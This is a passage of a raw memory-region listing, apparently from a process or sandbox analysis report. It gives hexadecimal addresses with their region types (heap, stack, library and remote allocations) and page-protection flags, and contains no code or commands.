page read and write
29B1C0C1000
trusted library allocation
page read and write
168ABD90000
heap
page execute and read and write
168ABB99000
heap
page read and write
21046D4A000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1EA3EE7A000
heap
page read and write
13135950000
heap
page read and write
5B0F0FF000
stack
page read and write
23A38F45000
heap
page read and write
29B1A280000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
1311B905000
heap
page read and write
2102E95E000
trusted library allocation
page read and write
155AB270000
heap
page readonly
7FFD9BA43000
trusted library allocation
page read and write
1AFAF5A0000
heap
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
7FFD9B930000
trusted library allocation
page execute and read and write
1B993D8F000
trusted library allocation
page read and write
1208EC50000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
C7B2FE000
stack
page read and write
21CEFBD7000
heap
page read and write
1311D371000
trusted library allocation
page read and write
1EA3EECD000
heap
page read and write
B51D97E000
stack
page read and write
20F8022B000
trusted library allocation
page read and write
BB457BE000
stack
page read and write
7FFD9B793000
trusted library allocation
page execute and read and write
7FFD9B93A000
trusted library allocation
page read and write
168952A0000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
2102CD60000
heap
page read and write
1C282881000
trusted library allocation
page read and write
1B993DE2000
trusted library allocation
page read and write
2905D5F0000
trusted library allocation
page read and write
23A3ABD4000
trusted library allocation
page read and write
24E91B31000
trusted library allocation
page read and write
2130000
heap
page read and write
1B9943C9000
trusted library allocation
page read and write
23A38C20000
heap
page read and write
C6F000
stack
page read and write
24EFFBB3000
heap
page read and write
1313583A000
heap
page read and write
29B1A845000
trusted library allocation
page read and write
24E81B69000
trusted library allocation
page read and write
471000
remote allocation
page execute and read and write
7FFD9B816000
trusted library allocation
page read and write
21046CE4000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
24EFFC1C000
heap
page read and write
C7B3FE000
stack
page read and write
1284000
heap
page read and write
1B993B3B000
trusted library allocation
page read and write
21046F30000
heap
page execute and read and write
293D438000
stack
page read and write
D22B7FB000
stack
page read and write
23A38E15000
heap
page read and write
1EA3F0A8000
trusted library allocation
page read and write
1C2808DB000
heap
page read and write
29B1A83B000
trusted library allocation
page read and write
1DBF8091000
heap
page read and write
1B991E80000
heap
page read and write
7FFD9BA3A000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
20FEA1C2000
heap
page read and write
1AFAD5F0000
heap
page read and write
24E99E81000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1C280A60000
trusted library allocation
page read and write
2905F060000
heap
page read and write
7FFD9BA23000
trusted library allocation
page read and write
1311B90B000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7FFD9BA21000
trusted library allocation
page read and write
23A52F80000
heap
page read and write
20F8185E000
trusted library allocation
page read and write
155AD131000
trusted library allocation
page read and write
7FFD9B902000
trusted library allocation
page read and write
16894AFB000
trusted library allocation
page read and write
155ACF89000
trusted library allocation
page read and write
29B1A2F0000
heap
page readonly
2216EAD7000
heap
page read and write
20FEC4A8000
heap
page read and write
29B1BA9F000
trusted library allocation
page read and write
293D27F000
stack
page read and write
1EA3EFBF000
trusted library allocation
page read and write
1AFAF8A0000
heap
page read and write
168ABEE3000
heap
page read and write
9ED6EFE000
stack
page read and write
1311D873000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1C28292F000
trusted library allocation
page read and write
168A36A1000
trusted library allocation
page read and write
445990E000
stack
page read and write
13135883000
heap
page read and write
16E00106000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
131357F2000
heap
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
2102E880000
heap
page execute and read and write
2102CEE5000
heap
page read and write
1DBF8060000
heap
page read and write
168ABED0000
heap
page read and write
165BE7E000
stack
page read and write
1311D47B000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
D32E6FE000
stack
page read and write
B51DD3E000
stack
page read and write
23A3ABE9000
trusted library allocation
page read and write
23A3B5B4000
trusted library allocation
page read and write
1B993C99000
trusted library allocation
page read and write
155C5040000
heap
page execute and read and write
29060FF7000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
24EFFF60000
heap
page read and write
168ABC48000
heap
page read and write
F5E17E000
stack
page read and write
24E81FDA000
trusted library allocation
page read and write
9ED6E7F000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
20FEA0DF000
heap
page read and write
A050FD000
stack
page read and write
7FFD9B922000
trusted library allocation
page read and write
322E000
stack
page read and write
7FFD9B942000
trusted library allocation
page read and write
1C2807F0000
heap
page read and write
53E0EFA000
stack
page read and write
16E00011000
trusted library allocation
page read and write
2560000
heap
page read and write
1B9946C5000
trusted library allocation
page read and write
20F81833000
trusted library allocation
page read and write
7FFD9BA5F000
trusted library allocation
page read and write
24E81C37000
trusted library allocation
page read and write
1DBF8020000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
168ABC40000
heap
page read and write
7FFD9B78B000
trusted library allocation
page read and write
1EA3EC50000
heap
page execute and read and write
7FFD9B9B0000
trusted library allocation
page read and write
21CEF830000
heap
page read and write
29B32BC9000
heap
page read and write
53E13FF000
stack
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
155ACC4D000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
29B18C55000
heap
page read and write
29B1A854000
trusted library allocation
page read and write
2102CDA6000
heap
page read and write
7FFD9BA0A000
trusted library allocation
page read and write
1EA3F037000
trusted library allocation
page read and write
16E6F340000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1B991C70000
heap
page read and write
1311D460000
trusted library allocation
page read and write
155AB14F000
heap
page read and write
21CEFAEE000
heap
page read and write
155AB0B9000
heap
page read and write
1311B7A2000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
9ED69FF000
stack
page read and write
13135852000
heap
page read and write
16E6F330000
heap
page readonly
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B806000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
1AFAF93C000
heap
page read and write
7FFD9B830000
trusted library allocation
page read and write
20FEA37E000
heap
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
445A17E000
stack
page read and write
9ED707E000
stack
page read and write
168936A1000
trusted library allocation
page read and write
1DBF7FF0000
heap
page read and write
16891DF0000
trusted library allocation
page read and write
B51D77F000
stack
page read and write
1B993990000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
165C13F000
stack
page read and write
2216E9B3000
heap
page read and write
1208CDC5000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
BB44FEF000
unkown
page read and write
E09397B000
stack
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
16891C25000
heap
page read and write
D22B1FF000
stack
page read and write
20F818B9000
trusted library allocation
page read and write
2216E630000
heap
page read and write
2905F074000
heap
page read and write
2102CFB5000
heap
page read and write
1B991C90000
heap
page read and write
155ACC79000
trusted library allocation
page read and write
23A52FE8000
heap
page read and write
16891D60000
trusted library allocation
page read and write
7FFD9B92A000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
23A3AD5D000
trusted library allocation
page read and write
1020000
heap
page read and write
2216E69D000
heap
page read and write
A04DFE000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9B932000
trusted library allocation
page read and write
1B991C40000
heap
page read and write
16E6D92E000
heap
page read and write
155AB345000
heap
page read and write
1C29A920000
heap
page execute and read and write
21CEF8A1000
heap
page read and write
E09464E000
stack
page read and write
D22B37F000
stack
page read and write
C7B73E000
stack
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
23A52E70000
heap
page read and write
23A53030000
heap
page read and write
21CEF79D000
heap
page read and write
3B6E000
stack
page read and write
240998F0000
heap
page read and write
23A38D5F000
heap
page read and write
29B18AA0000
heap
page read and write
2216C910000
heap
page read and write
E5F83FB000
stack
page read and write
16E000FF000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1311B720000
heap
page read and write
21CEFAD1000
heap
page read and write
84FB2FE000
stack
page read and write
7FFD9B800000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B93A000
trusted library allocation
page read and write
C7B1FE000
stack
page read and write
BB45637000
stack
page read and write
20FEC360000
heap
page execute and read and write
7FFD9B91A000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
B6E000
stack
page read and write
4459D7E000
stack
page read and write
155AAFF0000
heap
page read and write
1B9ABD37000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
D22B2FE000
stack
page read and write
2216EAD8000
heap
page read and write
1E0A2FE000
stack
page read and write
1B991EC0000
trusted library allocation
page read and write
293D17E000
stack
page read and write
7FFD9B962000
trusted library allocation
page read and write
120A6C70000
heap
page read and write
20F80C2B000
trusted library allocation
page read and write
2216C810000
heap
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
1B994640000
trusted library allocation
page read and write
7FFD9B93A000
trusted library allocation
page read and write
155AB300000
trusted library allocation
page read and write
7FFD9B762000
trusted library allocation
page read and write
1AFAF8A1000
heap
page read and write
F5DA7F000
unkown
page read and write
BB4630E000
stack
page read and write
23A38EE0000
trusted library allocation
page read and write
155AB0B2000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
293D0FD000
stack
page read and write
20FEC18D000
heap
page read and write
1208CB83000
heap
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
23A52FFF000
heap
page read and write
9ED7178000
stack
page read and write
1EA3EFFC000
trusted library allocation
page read and write
1EA3EF0E000
heap
page read and write
1B993C84000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
168ABBBA000
heap
page read and write
B51DBBE000
stack
page read and write
2102CDE5000
heap
page read and write
2102E965000
trusted library allocation
page read and write
7FFD9B782000
trusted library allocation
page read and write
D32E9FE000
stack
page read and write
7FFD9B790000
trusted library allocation
page read and write
59519F8000
stack
page read and write
20FEA080000
heap
page read and write
1AFAF91C000
heap
page read and write
1C29A994000
heap
page read and write
168ABBF1000
heap
page read and write
29B18A3A000
heap
page read and write
1B993C9D000
trusted library allocation
page read and write
E0931CE000
stack
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
20FEA0D0000
heap
page read and write
1B9A3911000
trusted library allocation
page read and write
1311D478000
trusted library allocation
page read and write
155C5270000
heap
page execute and read and write
BB454FE000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
23A38D5A000
heap
page read and write
168A3710000
trusted library allocation
page read and write
24EFFB55000
heap
page read and write
9ED72FB000
stack
page read and write
16891C1C000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
D32E97B000
stack
page read and write
7FFD9B931000
trusted library allocation
page read and write
21CEFB30000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
29B1A385000
heap
page read and write
1EA3EC57000
heap
page execute and read and write
24E9A002000
heap
page read and write
21CEFBD8000
heap
page read and write
29B189C2000
heap
page read and write
7FFD9B784000
trusted library allocation
page read and write
24E81970000
trusted library allocation
page read and write
293D53E000
stack
page read and write
1C282D04000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
2102EA7A000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1EA4EFB0000
trusted library allocation
page read and write
2905F5F1000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
29B1BD33000
trusted library allocation
page read and write
53E18FB000
stack
page read and write
2216C700000
heap
page read and write
2102E921000
trusted library allocation
page read and write
1AFAF93C000
heap
page read and write
16E6F990000
heap
page execute and read and write
7FFD9B932000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
E09377E000
stack
page read and write
20FEC17E000
heap
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
20FEC49C000
heap
page read and write
23A38F00000
heap
page execute and read and write
20FEA370000
heap
page read and write
1C282CC7000
trusted library allocation
page read and write
29B32E60000
heap
page read and write
1AFAF9A0000
heap
page read and write
D32E47F000
unkown
page read and write
29060C56000
trusted library allocation
page read and write
29B1A2E0000
trusted library allocation
page read and write
29B1A2C0000
trusted library allocation
page read and write
1B9ABCE0000
heap
page read and write
155C50DF000
heap
page read and write
4459E7F000
stack
page read and write
7FFD9B910000
trusted library allocation
page read and write
D32E1FE000
stack
page read and write
7FFD9B770000
trusted library allocation
page read and write
29060DA0000
trusted library allocation
page read and write
13CEBF6000
stack
page read and write
1311DA23000
trusted library allocation
page read and write
2216C844000
heap
page read and write
2102EA22000
trusted library allocation
page read and write
5B0ED8A000
stack
page read and write
1B9ABD61000
heap
page read and write
1311D185000
heap
page read and write
44599CE000
stack
page read and write
13CEAFE000
stack
page read and write
16E004A0000
trusted library allocation
page read and write
7FFD9B9D8000
trusted library allocation
page read and write
9ED727E000
stack
page read and write
1B991FE5000
heap
page read and write
1B993DE8000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page execute and read and write
23A52CF9000
heap
page read and write
168951DA000
trusted library allocation
page read and write
1EA3F392000
trusted library allocation
page read and write
21CEFAC3000
heap
page read and write
1AFAD6D1000
heap
page read and write
E09357E000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
1DBF8088000
heap
page read and write
16E6D910000
heap
page read and write
21CEFA30000
heap
page read and write
1EA3EEC3000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1EA3F0B2000
trusted library allocation
page read and write
1C292821000
trusted library allocation
page read and write
16E6FC50000
heap
page read and write
1C280850000
heap
page read and write
2905D5D0000
trusted library allocation
page read and write
1AFAF93C000
heap
page read and write
B51D673000
stack
page read and write
7FFD9B816000
trusted library allocation
page read and write
1E0A0FB000
stack
page read and write
23A3AD90000
trusted library allocation
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
168A3853000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1AFAF60D000
heap
page read and write
D22B479000
stack
page read and write
2905D520000
heap
page read and write
24E81C30000
trusted library allocation
page read and write
120A6BE9000
heap
page read and write
20F90011000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
E093B7F000
stack
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
2102CD9C000
heap
page read and write
1EA3F00F000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
23A52D12000
heap
page read and write
9ED6DFE000
stack
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
120A6B46000
heap
page execute and read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
165BD7E000
stack
page read and write
20FEC18F000
heap
page read and write
1311D469000
trusted library allocation
page read and write
29B1A9E2000
trusted library allocation
page read and write
23A3AD98000
trusted library allocation
page read and write
1311B6E0000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
13CE9FF000
stack
page read and write
1311D350000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
29B1BDB5000
trusted library allocation
page read and write
16E6D96C000
heap
page read and write
1B993E3F000
trusted library allocation
page read and write
1311D3F4000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
20FEA0F6000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
1311D5EA000
trusted library allocation
page read and write
168942CB000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
16E6D8D0000
heap
page read and write
7FFD9B768000
trusted library allocation
page read and write
5B0F8FF000
stack
page read and write
155AB240000
trusted library allocation
page read and write
1311D3AF000
trusted library allocation
page read and write
7FFD9B93A000
trusted library allocation
page read and write
29B18C5E000
heap
page read and write
2102E910000
heap
page read and write
BB45578000
stack
page read and write
1E0A278000
stack
page read and write
13CE8FF000
stack
page read and write
21CED917000
heap
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
1208E740000
heap
page read and write
155C5078000
heap
page read and write
21046C60000
heap
page read and write
7FFD9B754000
trusted library allocation
page read and write
1208E844000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
16E00088000
trusted library allocation
page read and write
29060C2A000
trusted library allocation
page read and write
1311D814000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
16891C3D000
heap
page read and write
2216C846000
heap
page read and write
BB458BE000
stack
page read and write
16E6D8F0000
heap
page read and write
13135920000
heap
page execute and read and write
20FEC366000
heap
page execute and read and write
7FFD9B790000
trusted library allocation
page read and write
20F9007C000
trusted library allocation
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
F5DB7F000
stack
page read and write
293D4BC000
stack
page read and write
7FFD9B90A000
trusted library allocation
page read and write
1DBF9B00000
heap
page read and write
168ABC5C000
heap
page read and write
293D07F000
stack
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
16E6D9DC000
heap
page read and write
5B0F6FD000
stack
page read and write
24E81B67000
trusted library allocation
page read and write
1AFAF93C000
heap
page read and write
2905EEC0000
heap
page execute and read and write
7FFD9BA40000
trusted library allocation
page read and write
1B991D8E000
heap
page read and write
B51DCBE000
stack
page read and write
21CED93A000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
24E99E40000
heap
page read and write
16E6FA02000
heap
page read and write
B51D8FE000
stack
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
168AB6A5000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
21CEFAF0000
heap
page read and write
1208E83E000
trusted library allocation
page read and write
1208CA20000
heap
page read and write
1208CD60000
trusted library allocation
page read and write
1EA3D545000
heap
page read and write
2EA0000
heap
page read and write
29B1A491000
trusted library allocation
page read and write
155AB0F8000
heap
page read and write
2905D560000
heap
page read and write
155AB280000
heap
page execute and read and write
21CEFAD0000
heap
page read and write
155C52D2000
heap
page read and write
23A52D21000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1EA3D180000
heap
page read and write
B51D9FE000
stack
page read and write
7FFD9B94A000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
31EF000
stack
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
1B991EDA000
heap
page read and write
20FEC390000
heap
page read and write
E093473000
stack
page read and write
24E99FF0000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1311B760000
heap
page read and write
293D1FE000
stack
page read and write
2102CDE3000
heap
page read and write
F5DEFD000
stack
page read and write
1311B7BC000
heap
page read and write
1E0A37B000
stack
page read and write
20FEC4B3000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
1AFAF9A1000
heap
page read and write
7FFD9B9DE000
trusted library allocation
page read and write
23A53240000
heap
page read and write
BB4573C000
stack
page read and write
E5F7AFE000
stack
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
7FFD9B8F2000
trusted library allocation
page read and write
2905D590000
heap
page read and write
1208CA50000
heap
page read and write
1B9A3981000
trusted library allocation
page read and write
29B1BD2F000
trusted library allocation
page read and write
1B993DA4000
trusted library allocation
page read and write
1C2808CA000
heap
page read and write
168ABEE0000
heap
page read and write
B51DDBE000
stack
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9B77B000
trusted library allocation
page read and write
1AFAF6A0000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
1311B6C0000
heap
page read and write
293D63E000
stack
page read and write
1B991D15000
heap
page read and write
5951293000
stack
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
155C5050000
heap
page read and write
24E81C2D000
trusted library allocation
page read and write
7FFD9B91A000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
9ED6FFC000
stack
page read and write
7FFD9B850000
trusted library allocation
page execute and read and write
1312D3E1000
trusted library allocation
page read and write
155C5088000
heap
page read and write
E0937FE000
stack
page read and write
1208E751000
trusted library allocation
page read and write
23A38FC0000
heap
page read and write
7FFD9B962000
trusted library allocation
page read and write
7FFD9B794000
trusted library allocation
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
7FFD9B753000
trusted library allocation
page execute and read and write
21CED93C000
heap
page read and write
29B32AC0000
heap
page read and write
21CEDC40000
heap
page read and write
24EFFEB0000
heap
page read and write
F5DAFF000
stack
page read and write
7FFD9BA50000
trusted library allocation
page read and write
84FAB3A000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
1311B79E000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
165BEFE000
stack
page read and write
21CEF731000
heap
page read and write
16E6DC80000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
960000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9B91A000
trusted library allocation
page read and write
1208E761000
trusted library allocation
page read and write
B51DE3C000
stack
page read and write
20FEA2D0000
trusted library allocation
page read and write
24E9A00F000
heap
page read and write
1AFAFA48000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page execute and read and write
7FFD9B793000
trusted library allocation
page execute and read and write
24E99E57000
heap
page read and write
29077954000
heap
page read and write
1C280913000
heap
page read and write
84FB1FE000
stack
page read and write
2102CDA4000
heap
page read and write
BB4583E000
stack
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
1311B7E4000
heap
page read and write
BB453FE000
stack
page read and write
2216E9C3000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
2216C8BB000
heap
page read and write
155ACD1F000
trusted library allocation
page read and write
23A52FB4000
heap
page read and write
F5E07F000
stack
page read and write
1EA3F446000
trusted library allocation
page read and write
23A3B31B000
trusted library allocation
page read and write
7FFD9BA19000
trusted library allocation
page read and write
23A3AD36000
trusted library allocation
page read and write
2102CE60000
heap
page read and write
C7B17F000
stack
page read and write
7FFD9B772000
trusted library allocation
page read and write
16E00049000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
24099985000
heap
page read and write
16E000F6000
trusted library allocation
page read and write
24E819E0000
heap
page execute and read and write
7FFD9BA90000
trusted library allocation
page read and write
1AFAD6F4000
heap
page read and write
2905EF00000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
7FFD9B9C0000
trusted library allocation
page read and write
21CEFAC3000
heap
page read and write
59526CE000
stack
page read and write
24EFFF64000
heap
page read and write
155ACC90000
trusted library allocation
page read and write
24E81FB6000
trusted library allocation
page read and write
24EFFB8C000
heap
page read and write
7FFD9B84C000
trusted library allocation
page execute and read and write
53E16FE000
stack
page read and write
23A38EC0000
trusted library allocation
page read and write
7FFD9B9A8000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9B962000
trusted library allocation
page read and write
1C282917000
trusted library allocation
page read and write
1208E79E000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
16891C23000
heap
page read and write
1AFAF910000
heap
page read and write
1AFAF91D000
heap
page read and write
29B18A37000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
290608BB000
trusted library allocation
page read and write
7FFD9B764000
trusted library allocation
page read and write
16E00147000
trusted library allocation
page read and write
20FEA1B4000
heap
page read and write
16E6FC60000
heap
page read and write
21CEFB31000
heap
page read and write
2905D693000
heap
page read and write
478000
remote allocation
page execute and read and write
1EA3D1BE000
heap
page read and write
7FFD9B876000
trusted library allocation
page execute and read and write
2216E931000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
595139F000
stack
page read and write
13135A30000
heap
page read and write
9ED6CFE000
stack
page read and write
29B189F6000
heap
page read and write
1DBF80EA000
heap
page read and write
2905D618000
heap
page read and write
1AFAD6F6000
heap
page read and write
1311D180000
heap
page read and write
1C282926000
trusted library allocation
page read and write
1208CB28000
heap
page read and write
23A38D69000
heap
page read and write
16E00103000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
2905D6F4000
heap
page read and write
1B9A3920000
trusted library allocation
page read and write
20FEBD10000
heap
page read and write
16891DF3000
trusted library allocation
page read and write
16891C68000
heap
page read and write
7FFD9B810000
trusted library allocation
page execute and read and write
165BA72000
stack
page read and write
293D6BB000
stack
page read and write
29B2A491000
trusted library allocation
page read and write
16893657000
heap
page execute and read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1C2808D1000
heap
page read and write
1311B880000
trusted library allocation
page read and write
7FFD9B84C000
trusted library allocation
page execute and read and write
21046E20000
heap
page execute and read and write
155AB030000
heap
page read and write
B51DA78000
stack
page read and write
21046CA8000
heap
page read and write
1E0A076000
stack
page read and write
2905D695000
heap
page read and write
21CED950000
heap
page read and write
20FEC19B000
heap
page read and write
23A38D00000
heap
page read and write
23A52D57000
heap
page read and write
BB452FE000
stack
page read and write
24E91B41000
trusted library allocation
page read and write
1311D466000
trusted library allocation
page read and write
7FFD9BA41000
trusted library allocation
page read and write
24E824AC000
trusted library allocation
page read and write
1B9943DA000
trusted library allocation
page read and write
155ACC10000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
16E6F2D5000
heap
page read and write
23A52FFB000
heap
page read and write
29B1A946000
trusted library allocation
page read and write
1C282D0C000
trusted library allocation
page read and write
1AFAF926000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
20FEA300000
heap
page readonly
24E91BA2000
trusted library allocation
page read and write
1AFAF927000
heap
page read and write
29B18A0E000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
168ABC20000
heap
page read and write
1EA3F9D5000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page execute and read and write
7FFD9B912000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
DBB000
stack
page read and write
2216E730000
heap
page read and write
1208CB8E000
heap
page read and write
BB4547E000
stack
page read and write
7FFD9B794000
trusted library allocation
page read and write
24099964000
heap
page read and write
20FEBD1A000
heap
page read and write
D32E5FD000
stack
page read and write
7FFD9B790000
trusted library allocation
page read and write
29B32BFC000
heap
page read and write
1AFAFA47000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1B9943B5000
trusted library allocation
page read and write
7FFD9B931000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
21CEDC45000
heap
page read and write
1C2826C0000
heap
page execute and read and write
16E6FA3B000
heap
page read and write
7FFD9B7AB000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
29B1BAB7000
trusted library allocation
page read and write
E0946CD000
stack
page read and write
16E000F9000
trusted library allocation
page read and write
84FAEFF000
stack
page read and write
1320000
heap
page read and write
120A6F50000
heap
page read and write
21CEFA31000
heap
page read and write
F5D783000
stack
page read and write
A052FE000
stack
page read and write
1C280AF0000
heap
page read and write
155C52CC000
heap
page read and write
21CEFA9F000
heap
page read and write
7FFD9BA34000
trusted library allocation
page read and write
23A3ABDE000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
D22C1CE000
stack
page read and write
168ABB60000
heap
page read and write
1E09C7F000
unkown
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
2102EA1F000
trusted library allocation
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
20FEA154000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
4459C7F000
stack
page read and write
1EA3D4F0000
heap
page read and write
2102E96C000
trusted library allocation
page read and write
20F81458000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
7FFD9BA00000
trusted library allocation
page read and write
155AD2EA000
trusted library allocation
page read and write
1311D3CD000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1AFAF969000
heap
page read and write
1208CB25000
heap
page read and write
21046E30000
heap
page read and write
29B18C50000
heap
page read and write
21CEFB00000
heap
page read and write
20FEA10F000
heap
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
16E00450000
trusted library allocation
page read and write
2905F3C1000
trusted library allocation
page read and write
1AFAF60D000
heap
page read and write
20FEBCA0000
heap
page execute and read and write
D22B072000
stack
page read and write
D22B67F000
stack
page read and write
1B991F10000
trusted library allocation
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
392D000
stack
page read and write
D22B4F8000
stack
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
29B18970000
heap
page read and write
D32F5CE000
stack
page read and write
24E81B20000
heap
page read and write
21CEF730000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
21CEFAA5000
heap
page read and write
9ED7CCE000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1AFAF5A6000
heap
page read and write
21CEFAA6000
heap
page read and write
155ACC25000
heap
page read and write
21CEFAA9000
heap
page read and write
1AFAD6C0000
heap
page read and write
E0935FE000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
2905D66B000
heap
page read and write
D22B3FF000
stack
page read and write
16E10001000
trusted library allocation
page read and write
1311B7AA000
heap
page read and write
F5DF7B000
stack
page read and write
7FFD9B972000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page read and write
293D5BE000
